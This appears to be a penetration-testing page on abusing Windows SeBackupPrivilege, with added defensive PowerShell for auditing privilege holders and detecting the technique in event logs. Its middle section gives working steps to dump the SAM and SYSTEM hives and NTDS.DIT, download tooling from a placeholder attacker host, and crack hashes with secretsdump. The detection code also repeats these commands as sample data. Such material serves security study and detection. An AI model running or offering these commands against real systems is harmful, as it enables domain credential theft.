SeBackupPrivilege can be used for privilege escalation because it lets its holder bypass file system access control: a token with this privilege enabled can read any file or directory on the system for backup purposes, regardless of the permissions set on it. Registry hives and the Active Directory database are therefore within reach of whoever holds the right.
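As an added example (not part of the original page), the PowerShell below audits which principals the local security policy assigns SeBackupPrivilege to, so a defender can confirm the right is limited to the groups that need it. By default Windows grants it to Administrators and Backup Operators. It assumes an elevated session, because `secedit /export` requires administrative rights; the function name `Get-SeBackupPrivilegeHolders` is my own, not a built-in cmdlet.

```powershell
# Added example: list the accounts holding SeBackupPrivilege in the local security policy.
# Assumes an elevated PowerShell session (secedit /export needs admin).
function Get-SeBackupPrivilegeHolders {
    $cfg = Join-Path $env:TEMP ("secpol-{0}.inf" -f [guid]::NewGuid())
    try {
        # Export only the user-rights area; the resulting .inf has a [Privilege Rights]
        # section with lines such as: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
        $null = secedit /export /cfg $cfg /areas USER_RIGHTS
        if (-not (Test-Path $cfg)) { throw "secedit export failed (are you elevated?)" }

        $line = Get-Content $cfg |
            Where-Object { $_ -match '^SeBackupPrivilege\s*=' } |
            Select-Object -First 1
        if (-not $line) { return @() }   # right is assigned to nobody on this host

        $line.Split('=')[1].Split(',') | ForEach-Object {
            $entry = $_.Trim()
            if ($entry.StartsWith('*')) {
                # secedit writes SIDs with a leading '*'; translate to a name when possible.
                $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $name = $entry.Substring(1) }   # unresolvable SID: keep it raw
            } else {
                $name = $entry
            }
            [pscustomobject]@{ Holder = $name; Raw = $entry }
        }
    } finally {
        Remove-Item $cfg -ErrorAction SilentlyContinue
    }
}

# Default assignment on a workstation or member server; anything beyond this
# (service accounts, custom groups, individual users) deserves review.
$expected = @('BUILTIN\Administrators', 'BUILTIN\Backup Operators')

Get-SeBackupPrivilegeHolders | ForEach-Object {
    $status = if ($expected -contains $_.Holder) { 'expected' } else { 'REVIEW' }
    '{0,-9} {1}' -f $status, $_.Holder
}
```

On a domain controller the default list is longer (Server Operators also receive the right), so adjust `$expected` to the baseline for the host role before treating a hit as anomalous.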
1. Dump SAM

```powershell
reg save HKLM\SAM C:\Windows\temp\SAM.bak
```
2. Dump SYSTEM

```powershell
reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM.bak
```
3. Dump NTDS.DIT

- Download SeBackupPrivilegeCmdLets.dll.
- Download SeBackupPrivilegeUtils.dll.
- Create vss.dsh (a diskshadow script that snapshots C: and exposes the snapshot as Z:):

```
set context persistent nowriters
set metadata c:\programdata\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:
```
Execution:

```powershell
iwr -uri http://<ATTACKER_HOST>/SeBackupPrivilegeCmdLets.dll -outfile C:\Windows\temp\SeBackupPrivilegeCmdLets.dll
iwr -uri http://<ATTACKER_HOST>/SeBackupPrivilegeUtils.dll -outfile C:\Windows\temp\SeBackupPrivilegeUtils.dll
iwr -uri http://<ATTACKER_HOST>/vss.dsh -outfile C:\Windows\temp\vss.dsh
cd "C:\Windows\temp"
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
diskshadow /s C:\Windows\temp\vss.dsh
Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit C:\Windows\temp\NTDS.DIT.bak
```
4. Extract the hashes offline on the attacker machine with Impacket

```bash
impacket-secretsdump -sam SAM.bak -system SYSTEM.bak -ntds NTDS.DIT.bak LOCAL
```
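Every step above leaves a distinctive command line in process-creation telemetry (Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled), and the logon that enables the right is recorded in Security Event ID 4672 ("Special privileges assigned to new logon") listing SeBackupPrivilege. As an added example that is not part of the original page, the PowerShell below runs simple indicator matching over a constructed sample of such records and raises an alert when one user trips more than one distinct indicator. The function name `Find-SeBackupAbuse` and the sample records are my own; in production, feed the function from `Get-WinEvent` rather than the inline array.

```powershell
# Added example: match process-creation command lines against the steps of the
# SeBackupPrivilege hive/NTDS dump technique. Patterns are case-insensitive
# (PowerShell -match default); single quotes keep backslashes literal for the regex.
$patterns = @(
    @{ Name = 'SAM hive export';       Regex = 'reg(\.exe)?\s+save\s+HKLM\\SAM\b' },
    @{ Name = 'SYSTEM hive export';    Regex = 'reg(\.exe)?\s+save\s+HKLM\\SYSTEM\b' },
    @{ Name = 'diskshadow script';     Regex = 'diskshadow(\.exe)?\s+/s\s' },
    @{ Name = 'SeBackupPrivilege DLLs'; Regex = 'SeBackupPrivilege(CmdLets|Utils)\.dll' },
    @{ Name = 'ntds.dit copy';         Regex = 'Copy-FileSeBackupPrivilege.*ntds\.dit' }
)

function Find-SeBackupAbuse {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        foreach ($p in $patterns) {
            if ($e.CommandLine -match $p.Regex) {
                [pscustomobject]@{
                    Time        = $e.Time
                    User        = $e.User
                    Indicator   = $p.Name
                    CommandLine = $e.CommandLine
                }
                break   # one indicator per record is enough for correlation
            }
        }
    }
}

# Constructed sample records (not real telemetry). Shape mirrors the fields a
# Sysmon EID 1 / Security 4688 event exposes: time, account, command line.
$events = @(
    [pscustomobject]@{ Time = '2024-01-01T10:00:01'; User = 'CORP\alice';   CommandLine = 'reg  query HKLM\SOFTWARE\Microsoft\Windows' },
    [pscustomobject]@{ Time = '2024-01-01T10:02:10'; User = 'CORP\bkp-svc'; CommandLine = 'wbadmin start backup -backupTarget:E: -include:C:' },
    [pscustomobject]@{ Time = '2024-01-01T10:05:31'; User = 'CORP\bob';     CommandLine = 'reg save HKLM\SAM C:\Windows\temp\SAM.bak' },
    [pscustomobject]@{ Time = '2024-01-01T10:05:40'; User = 'CORP\bob';     CommandLine = 'reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM.bak' },
    [pscustomobject]@{ Time = '2024-01-01T10:07:02'; User = 'CORP\bob';     CommandLine = 'diskshadow.exe /s C:\Windows\temp\vss.dsh' },
    [pscustomobject]@{ Time = '2024-01-01T10:07:45'; User = 'CORP\bob';     CommandLine = 'powershell.exe -c Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit C:\Windows\temp\NTDS.DIT.bak' }
)

$hits = Find-SeBackupAbuse -Events $events
$hits | Format-Table Time, User, Indicator -AutoSize

# A single "reg save" can be a legitimate backup job; several distinct indicators
# from the same account in a short window is the strong signal.
$hits | Group-Object User |
    Where-Object { @($_.Group.Indicator | Sort-Object -Unique).Count -ge 2 } |
    ForEach-Object {
        $seen = ($_.Group.Indicator | Sort-Object -Unique) -join ', '
        "ALERT: $($_.Name) matched $seen"
    }
```

To run this over live data, collect the records with `Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }` (or Security log Id 4688) and project each event's command line and account into the same three fields before passing them to the function; a deployment would also tighten the window to a few minutes per user rather than grouping across the whole result set.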